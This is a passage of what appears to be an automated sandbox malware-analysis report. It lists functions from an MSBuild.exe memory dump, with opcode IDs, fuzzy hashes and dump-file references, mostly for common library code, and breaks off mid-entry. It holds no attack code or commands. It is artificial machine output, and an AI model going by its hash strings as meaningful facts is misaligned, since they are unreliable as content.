                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b10931faed86225c7c07a7ec0386d77eabb9a7651da588ff27311fdd4d926efe
                                                                                                              • Instruction ID: 0b3c9430f522c7d3db4d0776a6b33b99dbaeff0715cfba32faf9f8d3c17671ed
                                                                                                              • Opcode Fuzzy Hash: b10931faed86225c7c07a7ec0386d77eabb9a7651da588ff27311fdd4d926efe
                                                                                                              • Instruction Fuzzy Hash: 7F90027120554842D14471584504A4A001997D0305F55C011A4065694DD7268E65B761
                                                                                                              Function 01152AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd46f6ec8684eb8a822ba97573cbc0db80b1a914f274b5ba8c266da19cda8bef
                                                                                                              • Instruction ID: 1b5159e1896cd99c77bba3f3307aa9ae3ecafdf711a1ec49edc9f8905d5a7129
                                                                                                              • Opcode Fuzzy Hash: dd46f6ec8684eb8a822ba97573cbc0db80b1a914f274b5ba8c266da19cda8bef
                                                                                                              • Instruction Fuzzy Hash: 9B9002E1201640924504B2588504B0E450997E0201B55C016E5055560CC62689619235
                                                                                                              Function 01152AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6858df91d61c516688a0c7b116ed58c49edce2e8baf3291b7917b9aa737ca98a
                                                                                                              • Instruction ID: a5a2e1f6880cb7a99318d8c739d745d448771f07a797a6835b63ad42e02aea71
                                                                                                              • Opcode Fuzzy Hash: 6858df91d61c516688a0c7b116ed58c49edce2e8baf3291b7917b9aa737ca98a
                                                                                                              • Instruction Fuzzy Hash: 6F90047531150003010DF55C070450F004FD7D5351355C031F5017550CD733CD715331
                                                                                                              Function 01152AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d7633bf9301f048a90a7779e7f400ab7ca77642f26cc0e1d0db43e557e3c2e17
                                                                                                              • Instruction ID: 1e8a94a22e36161a4bd0006ba0c4872cecf9edb1b1a5153ecbd08690fd0d3373
                                                                                                              • Opcode Fuzzy Hash: d7633bf9301f048a90a7779e7f400ab7ca77642f26cc0e1d0db43e557e3c2e17
                                                                                                              • Instruction Fuzzy Hash: 38900265221500020149B558070450F0449A7D6351395C015F5417590CC72289755321
                                                                                                              Function 01152D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8e6687b8c0a8c69f9c1415c401d40f9dbc1a8b186d9c7c2a68eeba5fb52a5fd5
                                                                                                              • Instruction ID: 55f33203e88252cb18534c3618ee2b1f7d834b744ad5161ff3206b0dedb7521e
                                                                                                              • Opcode Fuzzy Hash: 8e6687b8c0a8c69f9c1415c401d40f9dbc1a8b186d9c7c2a68eeba5fb52a5fd5
                                                                                                              • Instruction Fuzzy Hash: 3290026921350002D1847158550860E000997D1202F95D415A4016558CCA1689795321
                                                                                                              Function 01152D00 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8eaa36c275afd554952a1f3906bb25aaebd88f5034522a820b47b1b29cc5e645
                                                                                                              • Instruction ID: a261f2c7ae6a712e24c0037132a7510654cdec105907a0ea3273f48109e7ffb7
                                                                                                              • Opcode Fuzzy Hash: 8eaa36c275afd554952a1f3906bb25aaebd88f5034522a820b47b1b29cc5e645
                                                                                                              • Instruction Fuzzy Hash: 0490026120554442D10475585508A0A000997D0205F55D011A5065595DC7368961A231
                                                                                                              Function 01152D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a0df8ae1879e38db33b5365ca3c908cf9462e7476186abfa2f7e00460a334f6d
                                                                                                              • Instruction ID: c51a72dec1685634668a4afe3404048e02342b9164dea6ae2b79268c45947e7b
                                                                                                              • Opcode Fuzzy Hash: a0df8ae1879e38db33b5365ca3c908cf9462e7476186abfa2f7e00460a334f6d
                                                                                                              • Instruction Fuzzy Hash: C090026130150003D1447158551860A4009E7E1301F55D011E4415554CDA1689665322
                                                                                                              Function 01152DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b2a3718b984372f8a00657a9b1850c21f6897ff8800a774e6d093564ce7b0d1e
                                                                                                              • Instruction ID: 9c8f45b9c5fdd767f5ebd7787c1eb883ecbb2e740875b6fb433013d8ff554e89
                                                                                                              • Opcode Fuzzy Hash: b2a3718b984372f8a00657a9b1850c21f6897ff8800a774e6d093564ce7b0d1e
                                                                                                              • Instruction Fuzzy Hash: B390027124150402D1457158450460A000DA7D0241F95C012A4425554EC7568B66AB61
                                                                                                              Function 01152DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a90ae5bb05dc291c80542ea03cab8a1c4784f5411016f42839f62adb4c8db6d6
                                                                                                              • Instruction ID: f8ed9c147fa4fecb6f1451288f05775c686514a03478a1afdf2741ebb7d02498
                                                                                                              • Opcode Fuzzy Hash: a90ae5bb05dc291c80542ea03cab8a1c4784f5411016f42839f62adb4c8db6d6
                                                                                                              • Instruction Fuzzy Hash: 3A900261242541525549B158450450B400AA7E0241795C012A5415950CC6279966D721
                                                                                                              Function 01152C60 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 54f9803b5c4883cc6560916d5fc663335987c8e8b1847d1d2ad96e34c04308c2
                                                                                                              • Instruction ID: 3f74932a65e2ee9529af7ea4c5a7044e1f64862cf8c5f7134f59d3d17ba7c33d
                                                                                                              • Opcode Fuzzy Hash: 54f9803b5c4883cc6560916d5fc663335987c8e8b1847d1d2ad96e34c04308c2
                                                                                                              • Instruction Fuzzy Hash: 9D90027120150842D10471584504B4A000997E0301F55C016A4125654DC716C9617621
                                                                                                              Function 01152CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cee46d3f416f44c4c796e4b1611492a6e67be882ae8a7dcaaa5139e5ea369dad
                                                                                                              • Instruction ID: cfa12ccd12667aa9d31d85e131434d7e98c4901369631afdf787a61bb4fb1cf8
                                                                                                              • Opcode Fuzzy Hash: cee46d3f416f44c4c796e4b1611492a6e67be882ae8a7dcaaa5139e5ea369dad
                                                                                                              • Instruction Fuzzy Hash: 2290027120150402D1047598550864A000997E0301F55D011A9025555EC76689A16231
                                                                                                              Function 01152CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 160f37890667e068e0c39ad21699f25a996d3e2521f515c0ee823e726949f63f
                                                                                                              • Instruction ID: 344aa7afc7b922d380821b86613c8b5d2861bbb38dee383c6a17561300ffad0f
                                                                                                              • Opcode Fuzzy Hash: 160f37890667e068e0c39ad21699f25a996d3e2521f515c0ee823e726949f63f
                                                                                                              • Instruction Fuzzy Hash: 0590026160550402D1447158551870A001997D0201F55D011A4025554DC75A8B6567A1
                                                                                                              Function 01152CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e5eb81978b5634413dd70bfb74c9c031066bcf553c76dd190ace2be68d68cb01
                                                                                                              • Instruction ID: db009562afec959222618a8bd3a8e12347ea21777faeb5e6d6c6c6d070b91584
                                                                                                              • Opcode Fuzzy Hash: e5eb81978b5634413dd70bfb74c9c031066bcf553c76dd190ace2be68d68cb01
                                                                                                              • Instruction Fuzzy Hash: 3A90027120150403D1047158560870B000997D0201F55D411A4425558DD75789616221
                                                                                                              Function 01152F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3de7ee01ccd077faf19a7353b3ace0ba5ede3b8b36819bae5428a9e66716f312
                                                                                                              • Instruction ID: f615ebd6f2ff3c1fdfdfb120cc8fa3859ca5913ba11b0e63252a5cf5818397f9
                                                                                                              • Opcode Fuzzy Hash: 3de7ee01ccd077faf19a7353b3ace0ba5ede3b8b36819bae5428a9e66716f312
                                                                                                              • Instruction Fuzzy Hash: 059002A134150442D10471584514B0A0009D7E1301F55C015E5065554DC71ACD626226
                                                                                                              Function 01152F60 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08c703cc9db10e0c66c42755a61386bcdbcbf0bd63819440a754fcb2980f4252
                                                                                                              • Instruction ID: 26e5984b386a0356f9a177d928581a71e4014eb1b8bab8d3a8861994c95c9c49
                                                                                                              • Opcode Fuzzy Hash: 08c703cc9db10e0c66c42755a61386bcdbcbf0bd63819440a754fcb2980f4252
                                                                                                              • Instruction Fuzzy Hash: 6B9002A121150042D1087158450470A004997E1201F55C012A6155554CC62A8D715225
                                                                                                              Function 01152F90 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0af298cc95694654d8374b0b172c9b638cb234f8ea71e74a8dd56b4c46a982f8
                                                                                                              • Instruction ID: e3a75406ecbab3ca2e26b0ac9915f90765299e25479bd7a225e2b10b38a45091
                                                                                                              • Opcode Fuzzy Hash: 0af298cc95694654d8374b0b172c9b638cb234f8ea71e74a8dd56b4c46a982f8
                                                                                                              • Instruction Fuzzy Hash: 6090027120190402D1047158491470F000997D0302F55C011A5165555DC72689616671
                                                                                                              Function 01152FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b8348279455109b35a15913706fea4387eefd392d3a773fa9426a33d9dfdd49d
                                                                                                              • Instruction ID: b695e5d59af49ddf67d13b72c2ef37ef66a241ed499c68a76f87bc665412f781
                                                                                                              • Opcode Fuzzy Hash: b8348279455109b35a15913706fea4387eefd392d3a773fa9426a33d9dfdd49d
                                                                                                              • Instruction Fuzzy Hash: 669002616015004241447168894490A4009BBE1211755C121A4999550DC65A89755765
                                                                                                              Function 01152FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bb4e9617af7c348a6065e91f8a2f344c473e4f23e899f8318caf066d7772b911
                                                                                                              • Instruction ID: 5e1ba4814d8444c382812b09c993e5e3809879a3c93a9396e1aefafeb9785f38
                                                                                                              • Opcode Fuzzy Hash: bb4e9617af7c348a6065e91f8a2f344c473e4f23e899f8318caf066d7772b911
                                                                                                              • Instruction Fuzzy Hash: 1790027120190402D1047158490874B000997D0302F55C011A9165555EC766C9A16631
                                                                                                              Function 01152FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4a2b7e7802fafd8169a0c7b043116208ee6b25ac20ff7e75f28c6c2b58a3e32e
                                                                                                              • Instruction ID: 76c7bf8267f5751c9158e95c39cc52af74195ff0cf910393158d638744037508
                                                                                                              • Opcode Fuzzy Hash: 4a2b7e7802fafd8169a0c7b043116208ee6b25ac20ff7e75f28c6c2b58a3e32e
                                                                                                              • Instruction Fuzzy Hash: 00900261211D0042D20475684D14B0B000997D0303F55C115A4155554CCA1689715621
                                                                                                              Function 01152E30 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6937673d12d2f8895191f2b75b5bf359537408c22b0895bb04dc86b0dc751074
                                                                                                              • Instruction ID: e4ca0c6698d7e2af4440caf9828863a43c2bbc06c2ce16bf8c88c6732e50d678
                                                                                                              • Opcode Fuzzy Hash: 6937673d12d2f8895191f2b75b5bf359537408c22b0895bb04dc86b0dc751074
                                                                                                              • Instruction Fuzzy Hash: 1390026130150402D1067158451460A000DD7D1345F95C012E5425555DC7268A63A232
                                                                                                              Function 01152E80 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d5d3eafca447cdc20c69916fe634dc9ae8907a7e1070f57bb45703a841e950ca
                                                                                                              • Instruction ID: 1ab9a44952bef23aebeb2198e35de534d2cf9f24113d64324be2e24ddd28a089
                                                                                                              • Opcode Fuzzy Hash: d5d3eafca447cdc20c69916fe634dc9ae8907a7e1070f57bb45703a841e950ca
                                                                                                              • Instruction Fuzzy Hash: 7990026160150502D1057158450461A000E97D0241F95C022A5025555ECB268AA2A231
                                                                                                              Function 01152EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bd6caa0c0339d5d5a4d8637d91a9180441ae7c16edd6a6b06a878ac24506d242
                                                                                                              • Instruction ID: 3f8d84effba803332ae3bd6afadc6c20551e6a172143f78b0cb7392eb6d298a5
                                                                                                              • Opcode Fuzzy Hash: bd6caa0c0339d5d5a4d8637d91a9180441ae7c16edd6a6b06a878ac24506d242
                                                                                                              • Instruction Fuzzy Hash: 7C9002B120150402D1447158450474A000997D0301F55C011A9065554EC75A8EE56765
                                                                                                              Function 01152EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5e92b1734487212cc7da59e8d91d00a6dd33504a9dd20eccd18961ae7d0deb56
                                                                                                              • Instruction ID: a807827ea5700e584326d54a04eda36bf403520c9b8fbd706541630efac30b98
                                                                                                              • Opcode Fuzzy Hash: 5e92b1734487212cc7da59e8d91d00a6dd33504a9dd20eccd18961ae7d0deb56
                                                                                                              • Instruction Fuzzy Hash: AD9002A120190403D1447558490460B000997D0302F55C011A6065555ECB2A8D616235
                                                                                                              Function 01153010 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 995a6f5fc849f2cc24b0fafac87f502cf703dcc60141530f239c8c309ccee7ad
                                                                                                              • Instruction ID: aab35c52b506cf8c65d39bf472200be5830f27fe9aa510a6d9f8ff194b7562ac
                                                                                                              • Opcode Fuzzy Hash: 995a6f5fc849f2cc24b0fafac87f502cf703dcc60141530f239c8c309ccee7ad
                                                                                                              • Instruction Fuzzy Hash: 6F90026120194442D14472584904B0F410997E1202F95C019A8157554CCA1689655721
                                                                                                              Function 01153090 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: afbaf8ece70b81b9132c387e4ea405452c7d485e8e678ab2ed292a88c0b864ac
                                                                                                              • Instruction ID: 6581c15b0b12c4c49abbb17905edf0eaf589b950c0b37e63b0aa3c10d4c74ea5
                                                                                                              • Opcode Fuzzy Hash: afbaf8ece70b81b9132c387e4ea405452c7d485e8e678ab2ed292a88c0b864ac
                                                                                                              • Instruction Fuzzy Hash: 2590026124150802D1447158851470B000AD7D0601F55C011A4025554DC7178A7567B1
                                                                                                              Function 011539B0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10482a05269f3be36e2de34cbfb580a8ecb2615f334e13a34e2f4cd9aa604ad6
                                                                                                              • Instruction ID: 185202d98fdbabedb432d83a6610bcfd2cbd799395542cd72d877fd8f1e6ed27
                                                                                                              • Opcode Fuzzy Hash: 10482a05269f3be36e2de34cbfb580a8ecb2615f334e13a34e2f4cd9aa604ad6
                                                                                                              • Instruction Fuzzy Hash: 0690026124555102D154715C450461A4009B7E0201F55C021A4815594DC65689656321
                                                                                                              Function 01153D10 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: afe16934de6018057b1d5372fc211acbd1128b9bbf4c2ff362b436db503e29a3
                                                                                                              • Instruction ID: a190ea88a47aa0f0d61ed2ffcf02f67bd27ffa5a4799b0d9b4ae175dd97ccf3a
                                                                                                              • Opcode Fuzzy Hash: afe16934de6018057b1d5372fc211acbd1128b9bbf4c2ff362b436db503e29a3
                                                                                                              • Instruction Fuzzy Hash: 1C90027120250142954472585904A4E410997E1302B95D415A4016554CCA1589715321
                                                                                                              Function 01153D70 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 20a04954b0b1b8cef82c0cca22ee14ee811ddb64d44889c1d1549816bbb13303
                                                                                                              • Instruction ID: 5c8979d2ccb5a69ee405c57e4e1c0949f6deb4fd2743c0a02cc32f36964a4eae
                                                                                                              • Opcode Fuzzy Hash: 20a04954b0b1b8cef82c0cca22ee14ee811ddb64d44889c1d1549816bbb13303
                                                                                                              • Instruction Fuzzy Hash: A890027520150402D5147158590464A004A97D0301F55D411A4425558DC75589B1A221
                                                                                                              Function 01152C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction ID: 77062b74d4dc7a489741dfeced9d617147566824fc21923995049fbefe02ff05
                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Function 01152890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 28bab979eb9546fbb667d578e0686619cd40fe57a58f0fbb81bb939fdcbf73ea
                                                                                                              • Instruction ID: 7094e6baaaf31043c16ae7ba20fbf51b85c229c53f20d3cb6c6668e157cea3ee
                                                                                                              • Opcode Fuzzy Hash: 28bab979eb9546fbb667d578e0686619cd40fe57a58f0fbb81bb939fdcbf73ea
                                                                                                              • Instruction Fuzzy Hash: C751E6B6A04116EFCB59DB9C899097EFBF8BB08244714C12AF8B5D7641E374DE508BA0
                                                                                                              Function 011C2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
